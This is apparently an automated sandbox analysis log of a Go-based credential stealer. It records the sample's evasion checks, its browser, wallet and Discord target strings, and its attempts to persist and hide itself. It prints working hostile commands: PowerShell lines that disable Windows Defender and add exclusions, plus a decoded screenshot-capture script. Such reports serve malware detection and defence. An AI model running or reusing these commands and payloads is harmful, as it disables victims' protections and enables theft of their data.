Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Tries to delay execution (extensive OutputDebugStringW loop)

Source: C:\Users\user\Desktop\TMPN.exe

Section loaded: OutputDebugStringW count: 1942

Source: C:\Users\user\Desktop\TMPN.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6371	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3101	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5931	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1021

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3504	Thread sleep count: 6371 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912	Thread sleep count: 3101 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4540	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260	Thread sleep count: 5931 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032	Thread sleep count: 295 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 364	Thread sleep count: 1891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5012	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1600	Thread sleep count: 1021 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6116	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\TMPN.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File Volume queried: \Device\CdRom0\ FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: SecurityHealthSystray.exe.0.dr	Binary or memory string: Handshakemath/randClassINETAuthorityquestionsuser32.dllvmwaretrayxenservicevmwareusermegadumperscyllahidevirtualboxPxmdUOpVyxQ9IATRKPRHPaul Jonesd1bnJkfVlHQarZhrdBpjPC-DANIELEqarzhrdbpjq9iatrkprhd1bnjkfvlhJUDES-DOJOGJAm1NxXVmdOuyo8RV7105KvAUQKPQOf20XqH4VLpxmduopvyxJcOtj17dZxcM0uEGN4do64F2tKIqO5GexwjQdjXGfNBDSlDTXYmcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootlogins.txtLogin DataChrome SxS360BrowserUR BrowserdiscordptbinitiationByHackirbysecure.datauto_startsteam-tempEpic Games.minecraftRiot GamesShowWindow-NoProfileExtensionsExodusWeb3PaliWallet/dev/stdinCreateFileterminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dllexecerrdotSYSTEMROOTavatar_url
Source: SecurityHealthSystray.exe.0.dr	Binary or memory string: res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1POSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
Source: SecurityHealthSystray.exe.0.dr	Binary or memory string: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type TuesdayJanuaryOctoberMUI_StdMUI_DltAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutapdh.dllwindowswsarecvwsasendlookup writetoavx512fSHA-224SHA-256SHA-384SHA-512InstAltInstNopalt -> nop -> any -> NRGBA64derivedInitialExpiresSubjectcharsetos/execruntime::ffff:answers]?)(.*)Ed25519MD2-RSAMD5-RSAserial:#intern2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsavevmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversalUSERNAMEEIEEIFYEGBQHURCCORXGKKZCoreleepcJBYQTQBOMARCI-PClmVwjj9bGRXNNIIELUCAS-PCjulia-pcXGNSVODUESPNHOOLORELEEPCVONRAHELTMKNGOMUJULIA-PC05h00Gi05ISYH9SHICQja5iTQZSBJVWMUspG1y1CecVtZ5wEBUiA1hkmOZFUCOD6o8yTi52Th7dk1xPrQORxJKNkgL50ksOpSqgFOf3Gj.seancedxd8DJ7clmvwjj9beset.com-CommandDisabled0.0.0.0 Web DataWaterfoxK-MeleonCyberfoxBlackHawUsernamePasswordBrowsers```%s```ChromiumElementsCatalinaQIP SurfpasswordbancairemetamaskdatabasePicturesOneDriveindex.jsSettingssettings.featherNovolinealts.txtPaladiumgames-%s
Source: SecurityHealthSystray.exe.0.dr	Binary or memory string: OpenEventAUnlockFileunrechableno consoleenter-fastRIPEMD-160impossible[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]rune <nil>image: NewBM????res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1POSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
Source: SecurityHealthSystray.exe.0.dr	Binary or memory string: runtime: sp=abi mismatchnot pollableCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_NagriPdhOpenQueryLittleEndianmultipathtcp127.0.0.1:53no such hostCIDR addressunknown portinvalid portgetaddrinfowtransmitfileCreateEventACreateThreadGetTickCountPeekMessageWNetGetDCNameinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> tlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap trafficMime-VersionX-ImforwardsX-Powered-ByContent Type (sensitive)gotypesaliasRCodeSuccessRCodeRefusedECDSA-SHA256ECDSA-SHA384ECDSA-SHA512caller errorCoInitializeoleaut32.dllVariantClearSysStringLenRoInitializeSERIALNUMBERavx5124fmapsavx512bitalgvgauthservicevmwareservicejoeboxcontrolprocesshackerhttp debuggerextremedumperprotection_idw0fjuOVmCcP5Acompname_5076SYKGUIDE-WS17DESKTOP-BUGIOCOMPNAME_4047DOMIC-DESKTOPharry johnsonRGzcBUyrznRegw0fjuovmccp5aHarry Johnsonsal.rosenburg34.85.253.170109.74.154.9034.145.89.174192.40.57.234109.74.154.9134.145.195.5887.166.50.21335.192.93.10779.104.209.33213.33.142.5034.141.245.2588.132.231.7134.105.72.24193.216.75.209195.239.51.5920.99.160.17334.85.243.24184.147.54.113195.74.76.222192.87.28.10364.124.12.16234.105.183.6834.142.74.22092.211.55.199109.74.154.9235.229.69.22723.128.248.46scanguard.compcprotect.comus.norton.comkaspersky.combullguard.comzonealarm.combrowsers-tempdownloads.txtplaces.sqlitenssA102 errorFiles StealerdiscordcanaryBetterDiscorditerations_ivaccounts.jsonmeteor-clientCheatBreakersRise (Intent)Local StorageContenu de laAuthorization`Nitro Basic`AuthenticatorIsUserAnAdminFindFirstFilelevel 3 resetsrmount errortimer expiredexchange fullRegEnumKeyExWRegOpenKeyExWCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameRegDeleteKeyWRegEnumValueW relative to %s: %s (%v)%sempty integerunsupported: RtlMoveMemoryOpenClipboardSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATEAccept-RangesIf-None-MatchLast-Modified[FrameHeader invalid base accept-rangesauthorizationcache-controlcontent-rangeif-none-matchlast-modifiedCache-ControlFQDN too longsocks connectReset ContentLoop Detected3814697265625GetDriveTypeWDeleteServiceStartServiceWFindResourceWModule32NextWThread32FirstWaitCommEventRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodWTSFreeMemorydalTLDpSugct?GetTempPath2WwakeableSleepprofMemActiveprofMemFuturetraceStackTabexecRInternaltestRInternalGC sweep waitout of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}
Source: SecurityHealthSystray.exe.0.dr	Binary or memory string: tznamerdtscppopcntempty rune1 RGBA64Gray16X25519%w%.0wAcceptServercmd/goheaderAnswerLengthSTREETavx512rdrandrdseedwebhookcryptosregeditollydbgdf5servvmusrvctaskmgrqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe pro3u2v9m8SERVER1MIKE-PCNETTYPClisa-pcHEUeRzljohn-pcZELJAVALISA-PCWILEYPCJOHN-PCserver1wileypcAIDANPC7DBgdxuJAW4Dz0cMkNdS6Mr.Nonej7pNjWMequZE3Jo6jdigqKUv3bT4ymONofgheuerzlIVwoKUFavg.comDefaultFirefoxMercuryAddressNetworkCookiesHistorykey4.dbThoriumIridiumVivaldiOrbitumMaxthonK-MelonSputnikSlimjetOperaGXaccountaddressDesktopcontentAppDatadiscordmodulesRoamingversionWindowsFeatherBadlionleveldbAPPDATACaption%.2f GBprofileDiscord`Nitro`.sqlitecmd.exeWallets\ArmoryCoinomiBinanceMartianPhantomSafepalSolfareiWalletLICENSEProtectfloat32float64readdirconsoleabortedCopySidWSARecvWSASendconnectsignal runningPATHEXT\\.\UNC_pragmapragma _txlocknumber nil keyUpgradeTrailerHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUG:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT19531259765625FreeSidSleepExinvaliduintptrSwapperChanDir Value>ConvertforcegcallocmWcpuprofallocmRunknowngctraceIO waitsyscallwaitingUNKNOWN:events, goid= s=nil
Source: SecurityHealthSystray.exe.0.dr	Binary or memory string: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilcpu%dfilesimap2imap3imapspop3shostsrouteparsesse41sse42ssse3SHA-1matchrune NRGBAtls: Earlyutf-8%s*%dtext/bad n (at ClassP-224P-256P-384P-521ECDSAx32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidraVMwarevmwarexc64zb8VizSM373836ALIONETVM-PCgeorgeGRAFPCT00917test42XC64ZB5Y3y73serverh86LHDDdQrgcQfofoGlK3zMRPgfV1XIZZuXj8vizsmASPNETS7WjufUser01tHiF2TGjBsjbLouiseGGw8NR3W1GJT-ForceattribNumberembedssqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsecretpaypalbanquewalletcryptoexodusatomiccomptecreditpermisnumberbackupconfigVideosinlinefieldsConfigIntentMeteorImpactPolyMCBypassSystem
Source: TMPN.exe, 00000000.00000002.4592168811.0000028D46A14000.00000004.00000020.00020000.00000000.sdmp, SecurityHealthSystray.exe, 00000011.00000002.2282340160.00000254BEA44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SecurityHealthSystray.exe, 00000018.00000002.2380880169.000001B761AE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGG

Source: C:\Users\user\Desktop\TMPN.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\TMPN.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\TMPN.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABT

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\TMPN.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Users\user\Desktop\TMPN.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}			Jump to behavior

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\TMPN.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\TMPN.exe	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID	Jump to behavior
